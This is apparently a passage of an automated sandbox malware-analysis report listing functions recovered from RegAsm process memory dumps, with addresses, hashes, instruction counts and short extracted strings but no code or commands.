                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-3886637785
                                                                      • Opcode ID: b070c881c9ead33d06a4053d8627952e69bc676e699b49fc4cb3bfa73caa54a6
                                                                      • Instruction ID: b25346fba41ec8961c81a520a2d0a42b6e10f29fae262a135214f810264dc4e2
                                                                      • Opcode Fuzzy Hash: b070c881c9ead33d06a4053d8627952e69bc676e699b49fc4cb3bfa73caa54a6
                                                                      • Instruction Fuzzy Hash: B982CC74E5020A8FCB18EF68E96469DBBB1FF44704F5089A9D04AAB364DF305D8ACF51
                                                                      Function 06880D80 Relevance: 20.6, Strings: 16, Instructions: 620COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-2449488485
                                                                      • Opcode ID: 50b4810455ade277d017a59353af03b200b331881700b1f477bdf807ea4add1f
                                                                      • Instruction ID: 8bb4865c5d226ad3cb8e1c6a4d271b78bb9e48d410bf34ed3ec82cc9274f980b
                                                                      • Opcode Fuzzy Hash: 50b4810455ade277d017a59353af03b200b331881700b1f477bdf807ea4add1f
                                                                      • Instruction Fuzzy Hash: 7632D234B002099FDB55EB69C858A7EBBF6BF89304B14845AE506CB3A5CF35DC06CB91
                                                                      Function 06881514 Relevance: 10.5, Strings: 8, Instructions: 536COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-3823777903
                                                                      • Opcode ID: cd3c5ecd5d15d24764e68ad5fbd87ab25cfdc99926639a1cc4e31808b7a05a96
                                                                      • Instruction ID: 6253b9e404e2bd7034a5809afda6b577650b861ced240a360739bfcdca9974dc
                                                                      • Opcode Fuzzy Hash: cd3c5ecd5d15d24764e68ad5fbd87ab25cfdc99926639a1cc4e31808b7a05a96
                                                                      • Instruction Fuzzy Hash: 1412D134B0020A9FDB54BBA8C858A6E7BE7EF89704F108459E642CB3A5DF75DC06C791
                                                                      Function 02F757A0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q$`Q^q$`Q^q
                                                                      • API String ID: 0-846367443
                                                                      • Opcode ID: 9053cad05299c8104fce082aa86b8082ae281943bbeab9bcfac178f94e5d5fd8
                                                                      • Instruction ID: 2485ebd0c81f09d2cb8a5a5a007e9af4aaabd6e811a43aadb78ced4f160c09a6
                                                                      • Opcode Fuzzy Hash: 9053cad05299c8104fce082aa86b8082ae281943bbeab9bcfac178f94e5d5fd8
                                                                      • Instruction Fuzzy Hash: CA212671F402599FDB19EB74D850BAEB6A2FB80B44F68006ED606AF2C0C7B0594587D2
                                                                      Function 06880598 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $lPj
                                                                      • API String ID: 0-1476722723
                                                                      • Opcode ID: a8507c4e13f3d5102e6160bd6cf23c3cffe549204c9a0d514e70cda019633a1f
                                                                      • Instruction ID: 55f59f9a228a8a8ee3fe67e71aeefd117091646ceab0d0f6fa7d92bac66d38b4
                                                                      • Opcode Fuzzy Hash: a8507c4e13f3d5102e6160bd6cf23c3cffe549204c9a0d514e70cda019633a1f
                                                                      • Instruction Fuzzy Hash: D7029F307406199FDB64AF64C854A2E7BF2FF8A704F118859D5029B3A1CFB9EC09CB95
                                                                      Function 06881BA0 Relevance: 1.4, Instructions: 1438COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e90cfb85a316f394b4fd34494851dcac0c4383f46cb449b75f26bb7c02360308
                                                                      • Instruction ID: f515d37c68d09206c8c4779dfb87bb34cc41c2b717da279f30e4e3e72dc3dcc9
                                                                      • Opcode Fuzzy Hash: e90cfb85a316f394b4fd34494851dcac0c4383f46cb449b75f26bb7c02360308
                                                                      • Instruction Fuzzy Hash: 75C25E30A401189FCB54DF64CD55BADBBB6FF89700F108099E606AB3A1DB71AE81DF91
                                                                      Function 068A3DE0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: af85fee95f50e697974dd82a6ae58482e78e0f3876846abfbd4bacd6283fdad3
                                                                      • Instruction ID: 3d4caa1c2b8b48dcebb8dfeecd2509d128bbe37eb79d279b15241bb978b00f5c
                                                                      • Opcode Fuzzy Hash: af85fee95f50e697974dd82a6ae58482e78e0f3876846abfbd4bacd6283fdad3
                                                                      • Instruction Fuzzy Hash: A8313432B003514FCB1AE738A45466EBBE6EFC621074444AAE84ACB751CE34EC4BC791
                                                                      Function 068A84D8 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 7e3936e67bbb973428e2e8b6e5938ac9417d26e43075048a3a2d1030d5454beb
                                                                      • Instruction ID: 2d955af98a6f55767e2ffd9ebd881281842283e17467011dcd193b67206ac4c4
                                                                      • Opcode Fuzzy Hash: 7e3936e67bbb973428e2e8b6e5938ac9417d26e43075048a3a2d1030d5454beb
                                                                      • Instruction Fuzzy Hash: 8B318D31B102098BDB09BB79A4A457E7BE7EFC8210B104539D60BCB384EE35DD1687D2
                                                                      Function 068A84C8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 4a2488533f5421dc96e03f798bae17cdbb053e1608f0d593dc04c29f9724d9d3
                                                                      • Instruction ID: 50a73f494c94b7eaf3057bf666db5f2147334146f5ec74615005a14aa78f9de9
                                                                      • Opcode Fuzzy Hash: 4a2488533f5421dc96e03f798bae17cdbb053e1608f0d593dc04c29f9724d9d3
                                                                      • Instruction Fuzzy Hash: 8D21AD317102098BDB09BB78A4A867E3AE3ABC9211710497DD60BDB385EE35DD0687D2
                                                                      Function 02F7DC54 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq
                                                                      • API String ID: 0-1245868
                                                                      • Opcode ID: ae1068e8cf02b2371315a7dda49a5c01a59dc396a595681f96f915a055e54f3e
                                                                      • Instruction ID: 245e7e4929997f133bf69e1dd1bb5318e9fb1212ec2ed9a157cafbd73ca5e8ae
                                                                      • Opcode Fuzzy Hash: ae1068e8cf02b2371315a7dda49a5c01a59dc396a595681f96f915a055e54f3e
                                                                      • Instruction Fuzzy Hash: B721AF347046108FCA14AB38D468A2E77EBBFC5B94B1545AFE602CB7A1CF64DC06CB91
                                                                      Function 068A3EC8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 8e134d866cf530d75b73f1072c0a3e602ccb3ff1aa8ddf889abf13f98d84704a
                                                                      • Instruction ID: 22ebfce65c5378a4bec25c0f652f213ae5bca04d953050cfaea846710505e765
                                                                      • Opcode Fuzzy Hash: 8e134d866cf530d75b73f1072c0a3e602ccb3ff1aa8ddf889abf13f98d84704a
                                                                      • Instruction Fuzzy Hash: 30F090323406054FC218FB29E554A6EBBE7EBC92503509969D05A8B358EF20FC4A87A1
                                                                      Function 02F74AE0 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q
                                                                      • API String ID: 0-1948671464
                                                                      • Opcode ID: eec1df3e922a1d308dc459a9ac834778a10acc8ec87712344be8941a91cc3242
                                                                      • Instruction ID: 54aeae80ac4f49e2d5da0520b461c3b463d17e79400009d60cc0d67600290647
                                                                      • Opcode Fuzzy Hash: eec1df3e922a1d308dc459a9ac834778a10acc8ec87712344be8941a91cc3242
                                                                      • Instruction Fuzzy Hash: 6CE06D3374011427D218555EEC59F6BA6DAEBC9A25F69006AF109EB6A0CC92EC0542A5
                                                                      Function 068AB358 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 49e97840bff99fb02a55640d963b00e5ef0edfb692c6482d64ba2b32a3017a2a
                                                                      • Instruction ID: 96fa92e70712868488366325eb31373e0321787ff9273b0bd4d5a1fa21c79def
                                                                      • Opcode Fuzzy Hash: 49e97840bff99fb02a55640d963b00e5ef0edfb692c6482d64ba2b32a3017a2a
                                                                      • Instruction Fuzzy Hash: BA01AD74A01209EFCB04FFB8EA9869CBFF2FB44244F1444A9E40AA7325DB305E46CB11
                                                                      Function 068AB368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 767d2565ff8e7c56922ce17f446ed414f82106762e07da80cad5f90f14036ef9
                                                                      • Instruction ID: 1cd0503f9f8cfc02a5ebc31df18a8e19979170762cf3542f8cdeafa2c1e55467
                                                                      • Opcode Fuzzy Hash: 767d2565ff8e7c56922ce17f446ed414f82106762e07da80cad5f90f14036ef9
                                                                      • Instruction Fuzzy Hash: 43F03770A0120DEFCB44FFB8EA9859CFBB2FB84244B1045A9E80A97754EB305E498B51
                                                                      Function 02F74AF0 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q
                                                                      • API String ID: 0-1948671464
                                                                      • Opcode ID: 7cf7cee0cda880fc158226e8a1b7dad0e013f9e96ffd167d3df072386cb4ed4e
                                                                      • Instruction ID: 1fbf7829f0b6ffdb94704d5398a9809cb36fd724631d63fa0fd984645e9969e2
                                                                      • Opcode Fuzzy Hash: 7cf7cee0cda880fc158226e8a1b7dad0e013f9e96ffd167d3df072386cb4ed4e
                                                                      • Instruction Fuzzy Hash: 9EE086327401146BD318556FEC54F67B6DEEBC9A24F54007AF209DB3A0CC91EC0542A5
                                                                      Function 068800D8 Relevance: .7, Instructions: 676COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bc1d67f6707008aa79de3c3a1ca4174e3e0b81d3ea06dc1dd520d7a634fcd8e
                                                                      • Instruction ID: 9d66fc9dc202c359dcf1cda8b7826b2ddf4c4dbe81b9f88ab999bbebdb560054
                                                                      • Opcode Fuzzy Hash: 3bc1d67f6707008aa79de3c3a1ca4174e3e0b81d3ea06dc1dd520d7a634fcd8e
                                                                      • Instruction Fuzzy Hash: 3F426B307406199FCB64AF68D450A2EBBF2FBC6305B11495CD5039B3A5CFB9ED098B86
                                                                      Function 06880700 Relevance: .7, Instructions: 653COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65efbdb442865b22c9cd97c89277fe98f3f6b6c1a77d7e0752cd9b9eff24db39
                                                                      • Instruction ID: 40861ffb360421c97551f5bc918d63cec74308940882ef1535ec16a86bc6caef
                                                                      • Opcode Fuzzy Hash: 65efbdb442865b22c9cd97c89277fe98f3f6b6c1a77d7e0752cd9b9eff24db39
                                                                      • Instruction Fuzzy Hash: C7425C307406199FCB64AF68D450A2EB7F2FB86309B11495CD5039F3A5CFB9ED098B86
                                                                      Function 068A48B8 Relevance: .6, Instructions: 591COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fa1f6a60e108072edbebf7cc823760cd50451c69592c42a958422d378e4b83f
                                                                      • Instruction ID: 17708c361107c990e190afea40f180d4f89512fdf2cdee370f0328a6fa0e9474
                                                                      • Opcode Fuzzy Hash: 8fa1f6a60e108072edbebf7cc823760cd50451c69592c42a958422d378e4b83f
                                                                      • Instruction Fuzzy Hash: 44323735B006058FDB54DF29C588A6EBBF2FF88304B1584A9E906DB366DB74EC45CB90
                                                                      Function 068839B8 Relevance: .6, Instructions: 572COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 32d99317f99d54b0dc9cbe47fcf1a0637bdb2454a343bc99f0b8cf5aa9e50fec
                                                                      • Instruction ID: 7bef8e48a489f8e90ee3daac242c5a9970de3cf0f01047a493b2c1b810f62a35
                                                                      • Opcode Fuzzy Hash: 32d99317f99d54b0dc9cbe47fcf1a0637bdb2454a343bc99f0b8cf5aa9e50fec
                                                                      • Instruction Fuzzy Hash: AB322670B402189FCB54DF68C894EAABBF6FF89704F108099E506DB3A6DA71ED41CB50
                                                                      Function 06882070 Relevance: .6, Instructions: 570COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a359be05d803d2502ffee125f25209800f0c4b09630d18f61786b569f40f6c44
                                                                      • Instruction ID: ad5fba55a4f33a6a869553f12cb1c3a0eb95ba1b8d115b9f6b6bf7bfbb6170c6
                                                                      • Opcode Fuzzy Hash: a359be05d803d2502ffee125f25209800f0c4b09630d18f61786b569f40f6c44
                                                                      • Instruction Fuzzy Hash: 77229574B401188FCB54AB24C955EAE77B2FFC9704F108099EA069B3A6CF71ED81DB91
                                                                      Function 06880610 Relevance: .4, Instructions: 448COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f643769ed6e6f1c3a14d6b32ced2c827cc304c6747f881fdeddda70c0b614e7
                                                                      • Instruction ID: 7ebb1d21014091c10eedec02e7046652359f98f715e926c2a27b1e4ec0cccb63
                                                                      • Opcode Fuzzy Hash: 5f643769ed6e6f1c3a14d6b32ced2c827cc304c6747f881fdeddda70c0b614e7
                                                                      • Instruction Fuzzy Hash: 9C02A030B402189FDB64AB64C854A2E77F2FF8A704F118459D5029F3A1CFB9EC49CB91
                                                                      Function 068845C0 Relevance: .4, Instructions: 432COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 38e06b9f31381dda585c783004f2720da8f9b32335cfb67536f0d33676bc55a6
                                                                      • Instruction ID: fc3e587ef310258bea47f41ea049fec32de02da4f71a8778e44aa7202633b613
                                                                      • Opcode Fuzzy Hash: 38e06b9f31381dda585c783004f2720da8f9b32335cfb67536f0d33676bc55a6
                                                                      • Instruction Fuzzy Hash: B6F15E75B401059FCB54EF68C894E9EBBF6FF89704B1580AAE506DB362CA31EC05CB61
                                                                      Function 06880688 Relevance: .4, Instructions: 389COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daede141ce218bc586de72893fc472937c8210ecba779489837c7f04cb60aff7
                                                                      • Instruction ID: 6642baae1053a67d1b9e002102887e6d37d3bd6e53fd0b8db9ffc69ae90a576c
                                                                      • Opcode Fuzzy Hash: daede141ce218bc586de72893fc472937c8210ecba779489837c7f04cb60aff7
                                                                      • Instruction Fuzzy Hash: F0E1A234B402189FDB54AB64C855B2E77B6FF8A704F118459E602CB3A1CFB9EC49CB91
                                                                      Function 068800B8 Relevance: .4, Instructions: 356COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 350e33825edbdd3e822ca7a7ca2e6e4f08ea423de8817e5c31c9eef310ea4993
                                                                      • Instruction ID: 06235cef5dfa239f6e9fca857882c68957cdc44ae7a7d16c9474b8ba624b5e8f
                                                                      • Opcode Fuzzy Hash: 350e33825edbdd3e822ca7a7ca2e6e4f08ea423de8817e5c31c9eef310ea4993
                                                                      • Instruction Fuzzy Hash: 8AD18234B102089FDB54AB64C959B6E7BB6FF8A704F118056E602CB3A1CFB9DC45CB91
                                                                      Function 02F7DDE8 Relevance: .3, Instructions: 332COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9e3f357d93189bcab72e923216d96564b6e8854fa8a85f361f6d586bdff2844
                                                                      • Instruction ID: e14d77aba0b182c382a5a494d73fdc9ddef425be6fa4eb732b991c5f07403b1f
                                                                      • Opcode Fuzzy Hash: f9e3f357d93189bcab72e923216d96564b6e8854fa8a85f361f6d586bdff2844
                                                                      • Instruction Fuzzy Hash: 90E12C75A00219CFDB15DF64C884B9DB7B2FF85348F1144AAEA09BB261CB71AD86CF50
                                                                      Function 068A48A8 Relevance: .3, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae7ef8c10238062e136eb20a11286a752bdb0c130cc2a4860d967ce2251d8ef6
                                                                      • Instruction ID: 680b76634476ce75b2dbac2bbf792d3a0101eda04fff5453090ce939ce4f1beb
                                                                      • Opcode Fuzzy Hash: ae7ef8c10238062e136eb20a11286a752bdb0c130cc2a4860d967ce2251d8ef6
                                                                      • Instruction Fuzzy Hash: CEB13534B006048FDB44DF39D598A6EBBF2BF89204B1580A8E946DB376DB74EC05CB51
                                                                      Function 068845A4 Relevance: .2, Instructions: 248COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 126fa082b6bfbf224fcc9a0ac0ce9ddeb05453ae3ab4f7b22940240f4c7af8d4
                                                                      • Instruction ID: c91708ed785e4923470da0b7e7f1222861880394dba8322823c5d469b614849e
                                                                      • Opcode Fuzzy Hash: 126fa082b6bfbf224fcc9a0ac0ce9ddeb05453ae3ab4f7b22940240f4c7af8d4
                                                                      • Instruction Fuzzy Hash: 47912A35B401049FCB54EF68C995E9EBBF6FF89B04B118099E606DB362CA71EC01CB60
                                                                      Function 02F78390 Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29e65b693d2bd3036f3d12e0d12b7b36a129d8d92b1de94ce83aaf9b737ac0fa
                                                                      • Instruction ID: d70805b792014c8baca70b2df19dc44a49899a52d217490b7956dfede0d84003
                                                                      • Opcode Fuzzy Hash: 29e65b693d2bd3036f3d12e0d12b7b36a129d8d92b1de94ce83aaf9b737ac0fa
                                                                      • Instruction Fuzzy Hash: BFA16531A10605CFCB04DF68C89499DBBB6FF89310F1586A9E505AB365EB71ED89CF80
                                                                      Function 02F7A9D0 Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4291e0d76b62822a1d6fe0bb4d8130803b38fa86a45d9220f10cb81482bbe1f1
                                                                      • Instruction ID: 54206053bf86ee39fd546070a5b9f0486c1dabedc17e7408870e59a496e5e031
                                                                      • Opcode Fuzzy Hash: 4291e0d76b62822a1d6fe0bb4d8130803b38fa86a45d9220f10cb81482bbe1f1
                                                                      • Instruction Fuzzy Hash: 33816930B00A019FDB15EF28D955B6E77E6BF45388F05062AD642CB794DB34E891CBA1
                                                                      Function 02F75CC4 Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ac3dcab1c44f1f93624a67c918c6fc556260aea4d9cfac385d39d16fee2e548
                                                                      • Instruction ID: 8fb8b22fca18d0f5fc646bdbf60c0283eaa45416eb5671f656d6cccd6b9d9e6b
